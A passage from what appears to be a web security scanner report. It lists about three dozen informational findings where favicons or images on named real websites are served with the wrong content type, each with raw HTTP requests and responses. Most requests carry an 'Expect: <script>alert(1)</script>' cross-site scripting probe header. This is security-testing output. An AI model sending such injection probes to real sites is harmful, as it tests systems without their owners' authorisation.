User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.onlineincomeflood.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:48:29 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.168. http://www.orb.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.orb.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.orb.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 04:13:02 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=60
Last-Modified: Thu, 23 Dec 2010 23:58:52 GMT
ETag: "12a4199-491e-4981ca6d00700"
Accept-Ranges: bytes
Content-Length: 18718
Expires: Thu, 05 May 2011 04:13:02 GMT
Cache-Control: max-age=86400
Cache-Control: public

...... ..........V...........h.......00.... ..%..f... .... ......4........ .h....D..(... ...@...............................*V2.G.j.....~...>.N.....R.......\.~.b...R.n.....B.Z.N.n.....q.~........._.
...[SNIP]...

31.169. http://www.ouc.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ouc.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ouc.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:38:06 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.170. http://www.pazsaz.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.pazsaz.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pazsaz.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:25:48 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.171. http://www.pcc.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.pcc.edu
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pcc.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:43:53 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.172. http://www.petstore.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.petstore.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.petstore.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:02:32 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.173. http://www.pfchangshomemenu.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.pfchangshomemenu.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pfchangshomemenu.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 01 Apr 2011 22:00:25 GMT
ETag: "12a0188-1636-49fe2897df040"
Accept-Ranges: bytes
Content-Length: 5686
Content-Type: text/plain; charset=UTF-8
Date: Wed, 04 May 2011 01:26:38 GMT
Connection: close
X-N: S

..............h...&... .... .........(....... .................................    ...................*../...0...5...8...9...=...>..    3...0...3...8...=.    .$...$../...1...6...7...;...;...0...7..9...:...
...[SNIP]...

31.174. http://www.playbillstore.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.playbillstore.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.playbillstore.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 03:16:53 GMT
Cache-Control: private
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 19

expectation failed"

31.175. http://www.pny.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.pny.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pny.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Connection: Close
Content-Type: text/html

<div style="border: 3px solid #4991C5; font:1.5em; font-family:tahoma,calibri,arial; font-weight:bold; color:#1A4369; padding:5px; margin:10px; text-align:center"> The specified URL cannot be found.
...[SNIP]...

31.176. http://www.poolpartsonline.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.poolpartsonline.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.poolpartsonline.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:39:00 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.177. http://www.popsugar.co.uk/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.popsugar.co.uk
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.popsugar.co.uk
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
X-Sugar-Origin-Server: sugar-prod-web013-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Content-Type: image/gif
Server: lighttpd/1.4.26
Content-Length: 294
Date: Wed, 04 May 2011 03:24:17 GMT
Connection: close

.PNG
.
...IHDR................a....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b`....Lm...|j..h..R..\E.#....c.c8.f.(. ..H..@.>.r....#if.......P@Z......M#6.r.. ~...Y..z......(;..... 5..4......H.G.!`.(
...[SNIP]...

31.178. http://www.posterrevolution.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.posterrevolution.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.posterrevolution.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:57:12 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.179. http://www.povo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.povo.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.povo.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:46:50 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.180. http://www.preschoolexpress.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.preschoolexpress.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.preschoolexpress.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 02:23:09 GMT
Server: Apache
Content-Length: 20
Content-Type: text/html; charset=iso-8859-1

Expect not supported

31.181. http://www.quantumjumping.com/media/images/a/meditation4.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.quantumjumping.com
Path:   /media/images/a/meditation4.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a JPEG image.

Request

GET /media/images/a/meditation4.png HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/products
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.4.10.1304487910; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:54:06 GMT
Content-Type: image/png
Content-Length: 14859
Last-Modified: Tue, 03 May 2011 05:50:38 GMT
Connection: close
Accept-Ranges: bytes

......JFIF.............XICC_PROFILE......HLino....mntrRGB XYZ .....    ...1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt..
...[SNIP]...

31.182. http://www.quiltersclubofamerica.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.quiltersclubofamerica.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.quiltersclubofamerica.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
CommunityServer: 4.1.31106.3070
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Tue, 03 May 2011 22:26:02 GMT; domain=quiltersclubofamerica.com; expires=Thu, 03-May-2012 03:26:02 GMT; path=/
Set-Cookie: CommunityServer-LastVisitUpdated-2101=; path=/
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:26:02 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.183. http://www.radiological.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.radiological.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.radiological.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:22:00 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.184. http://www.rajshri.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.rajshri.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rajshri.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:29:58 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.185. http://www.reservebranson.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.reservebranson.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.reservebranson.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
P3P: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:39:20 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.186. http://www.rmatrackr.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.rmatrackr.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rmatrackr.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:06:51 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.187. http://www.runningwarehouse.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.runningwarehouse.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.runningwarehouse.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:28:22 GMT
Server: 4D_WebSTAR_S/5.4.0 (MacOS X)
Connection: Close
Accept-Ranges: bytes
Last-Modified: Tue, 21 Feb 2006 00:05:45 GMT
Content-Length: 3638
Content-Type: text/html

..............h...&... ..............(....... ...........@...........................~~......>=@...!.........[Z].....nmp.............,+/.MLO.....dcf.........437...........
.wvy.....FEH.............$#
...[SNIP]...

31.188. http://www.saclibrary.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.saclibrary.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.saclibrary.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:44:56 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.189. http://www.sanjeevkapoor.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.sanjeevkapoor.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sanjeevkapoor.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:33:59 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.190. http://www.savvysugar.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.savvysugar.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.savvysugar.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
X-Sugar-Origin-Server: sugar-prod-web018-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Content-Type: image/gif
Server: lighttpd/1.4.26
Content-Length: 518
Date: Wed, 04 May 2011 01:01:41 GMT
Connection: close

.PNG
.
...IHDR................a....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..S.N.@..--..S...).\<.0.N}.5..8..7 <.G=.M...=.......X.z0....O.:[.A.._.ng..7.3..&...L.......
...k;..T..QJ..$..E...
#3S.7.6
...[SNIP]...

31.191. http://www.sccommed.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.sccommed.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sccommed.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:42:38 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.192. http://www.scjohnson.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.scjohnson.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.scjohnson.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Server: Web02
Date: Wed, 04 May 2011 03:17:01 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.193. http://www.screamindailydeals.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.screamindailydeals.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.screamindailydeals.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:34:06 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.194. http://www.seaeagle.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.seaeagle.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.seaeagle.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:33:15 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.195. http://www.sharenator.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.sharenator.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sharenator.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
P3P: CP=\"IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA\"
Expires: Tue, 03 May 2011 20:28:16 GMT
Cache-Control: max-age=1
Content-Type: image/gif
Accept-Ranges: bytes
ETag: "4137985242"
Last-Modified: Tue, 15 Sep 2009 17:06:21 GMT
Content-Length: 894
Date: Tue, 03 May 2011 20:28:15 GMT
Server: Apache

..............h.......(....... ...............H...H.....................................................................................................................................................
...[SNIP]...

31.196. http://www.sibcycline.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.sibcycline.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sibcycline.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:20:17 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.197. http://www.silobreaker.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.silobreaker.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.silobreaker.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:13:06 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.198. http://www.sinclairinstitute.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.sinclairinstitute.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sinclairinstitute.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
Content-Length: 75
Vary: Accept-Encoding
Date: Wed, 04 May 2011 03:40:19 GMT
Connection: close

The page cannot be displayed because an internal server error has occurred.

31.199. http://www.sitewit.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.sitewit.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sitewit.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:22:19 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.200. http://www.slb.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.slb.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.slb.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:16:27 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.201. http://www.smsumustangs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.smsumustangs.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.smsumustangs.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:35:52 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=hq15n3yfy2nvnr552byiigam; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 66


We're sorry, the page you are looking for cannot be found.


31.202. http://www.softlinens.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.softlinens.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.softlinens.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 01:07:54 GMT
Cache-Control: private
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 19

expectation failed"

31.203. http://www.startexpower.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.startexpower.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
